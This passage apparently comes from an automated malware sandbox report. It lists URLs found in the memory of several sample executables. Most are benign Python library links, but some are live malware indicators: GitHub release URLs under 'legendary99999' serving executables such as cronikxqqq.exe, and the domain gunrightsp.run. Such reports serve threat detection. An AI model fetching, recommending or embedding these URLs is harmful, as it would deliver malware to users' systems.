0000002A.00000003.1627401291.000001E1696A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/astral-sh/ruff
                                      Source: futors.exe, 0000000F.00000003.1963918863.0000000003F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/bbbdfbfdb/releases/download/bbbbbbfff/mrwipre12.exeJ
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/rel
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/relH
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exe
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exe1
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exe1pE:
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exee1
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exee163
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exee1638nD
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exeh
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exe
                                      Source: futors.exe, 0000000F.00000003.1404032504.000000000157F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exe2
                                      Source: futors.exe, 0000000F.00000003.1632617370.000000000150B000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exee
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exefe3f6-b
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exefe3f6748f0f227
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exefe3f67nb
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exefe3f8b
                                      Source: trano1221.exe, 00000023.00000003.1608803599.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1608559838.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1613878589.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1614097963.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1613878589.0000013C2C402000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1582872658.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1973720785.00007FF98B765000.00000004.00000001.01000000.0000003A.sdmp, trano1221.exe, 0000002A.00000002.1974119123.00007FF98B799000.00000004.00000001.01000000.00000038.sdmpString found in binary or memory: https://github.com/mhammond/pywin32
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
                                      Source: trano1221.exe, 0000002A.00000002.1949395926.000001E16BD20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
                                      Source: trano1221.exe, 0000002A.00000002.1950520854.000001E16C45C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-pillow/Pillow/
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1933157269.000001E16AEE8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                      Source: trano1221.exe, 0000002A.00000003.1627401291.000001E1696A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                      Source: trano1221.exe, 0000002A.00000003.1811281205.000001E169697000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1836271125.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1924598134.000001E1696A1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1888194813.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1629342002.000001E169689000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1891421330.000001E16969D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1939610283.000001E16B2B4000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815054639.000001E16969B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1627401291.000001E1696A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                      Source: trano1221.exe, 0000002A.00000003.1832765232.000001E16B2EC000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1657678255.000001E16B960000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1940534889.000001E16B33C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817006737.000001E16B2E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues
                                      Source: trano1221.exe, 0000002A.00000003.1811281205.000001E169697000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1836271125.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1924598134.000001E1696A1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1888194813.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1629342002.000001E169689000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1891421330.000001E16969D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1939610283.000001E16B2B4000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815054639.000001E16969B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1627401291.000001E1696A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882675982.000001E16BAB0000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1858813276.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                                      Source: trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1863172789.000001E16B56F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806059046.000001E16BAE5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880210684.000001E16BC1A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883906457.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880906094.000001E16B582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1942810073.000001E16B58C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1822487423.000001E16B586000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946483979.000001E16BAEA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880906094.000001E16B58C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806059046.000001E16BAE5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883906457.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                                      Source: trano1221.exe, 0000002A.00000003.1832271041.000001E16B61B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                                      Source: UD49QH6.exe, 00000010.00000003.5078356884.000000000139A000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1466867227.0000000001393000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1507260993.000000000139A000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1491760052.000000000139A000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1417238243.0000000001324000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1481800211.000000000139A000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1417238243.0000000001314000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run/
                                      Source: UD49QH6.exe, 00000010.00000003.1508423546.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.5078356884.000000000139A000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1507260993.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1481800211.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1491760052.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2080300600.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.5078654939.000000000133B000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1466867227.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2079265890.0000000001338000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1508155790.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1417138519.0000000001339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run/bksaHyg
                                      Source: UD49QH6.exe, 00000010.00000003.1508423546.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run/bksaHyg0
                                      Source: UD49QH6.exe, 00000010.00000003.1507260993.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1481800211.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1491760052.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2080300600.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1466867227.00000000013A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run/bksaHygAzw8
                                      Source: UD49QH6.exe, 00000010.00000003.1508423546.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1463213398.0000000005B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run/bksaHygu
                                      Source: UD49QH6.exe, 00000010.00000003.2079965638.0000000005C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run:443/bksaHyg2
                                      Source: UD49QH6.exe, 00000010.00000003.1463213398.0000000005B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run:443/bksaHygicrosoft
                                      Source: trano1221.exe, 0000002A.00000003.1815421865.000001E16BBCE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832831955.000001E16BBE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                                      Source: trano1221.exe, 0000002A.00000003.1880906094.000001E16B582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                                      Source: trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_metadata.svg
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
                                      Source: UD49QH6.exe, 00000010.00000003.1450202345.0000000005B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
                                      Source: trano1221.exe, 0000002A.00000002.1949395926.000001E16BD20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
                                      Source: trano1221.exe, 0000002A.00000003.1815421865.000001E16BBCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                                      Source: trano1221.exe, 0000002A.00000003.1894885445.000001E16BC08000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813822027.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1831036072.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1871438491.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1881267013.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882569817.000001E16BC07000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815421865.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882379108.000001E16BBFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
                                      Source: powershell.exe, 00000019.00000002.1600308325.00000000058D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                      Source: futors.exe, 0000000F.00000003.1400745031.0000000001543000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1553741184.0000000001547000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/
                                      Source: futors.exe, 0000000F.00000003.1400745031.0000000001543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/f%
                                      Source: futors.exe, 0000000F.00000003.1811877759.0000000003F80000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1811811339.0000000003F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/925133393/acb1529f-d07e
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/931090743/fe2351f3-d512
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/942997733/91e9cb20-bc50
                                      Source: futors.exe, 0000000F.00000003.1948303472.0000000003F82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/948814638/06c7ea24-3162
                                      Source: futors.exe, 0000000F.00000003.1963918863.0000000003F87000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1963918863.0000000003F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/949262026/4eb1afe7-d182
                                      Source: futors.exe, 0000000F.00000003.1400745031.0000000001543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/nZT
                                      Source: trano1221.exe, 0000002A.00000003.1804418435.000001E16B9B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
                                      Source: trano1221.exe, 0000002A.00000002.1941681244.000001E16B3E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                                      Source: trano1221.exe, 0000002A.00000002.2006486368.00007FF98E76B000.00000040.00000001.01000000.0000001C.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/importlib_metadata
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
                                      Source: trano1221.exe, 0000002A.00000003.1638675310.000001E16B605000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1643633653.000001E16B620000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1642098430.000001E16B61D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1693368884.000001E16B53F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1698853025.000001E16B52A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1822487423.000001E16B586000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1646562116.000001E16B53F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1639883128.000001E16B5B3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1656139769.000001E16B567000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1638675310.000001E16B605000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1643633653.000001E16B620000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1658799975.000001E16B53F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1672685606.000001E16B53F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1642098430.000001E16B61D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
                                      Source: trano1221.exe, 0000002A.00000003.1638675310.000001E16B605000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1643633653.000001E16B620000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1642098430.000001E16B61D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr:
                                      Source: trano1221.exe, 0000002A.00000003.1638675310.000001E16B605000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1643633653.000001E16B620000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1642098430.000001E16B61D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr:r;Nr
                                      Source: m0wsoI3.exe, 00000011.00000003.1501994471.000000000F41E000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1531427752.0000000010285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                      Source: m0wsoI3.exe, 00000011.00000002.1531427752.0000000010285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                                      Source: UD49QH6.exe, 00000010.00000003.1449386649.0000000005E8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                                      Source: m0wsoI3.exe, 00000011.00000003.1501994471.000000000F41E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
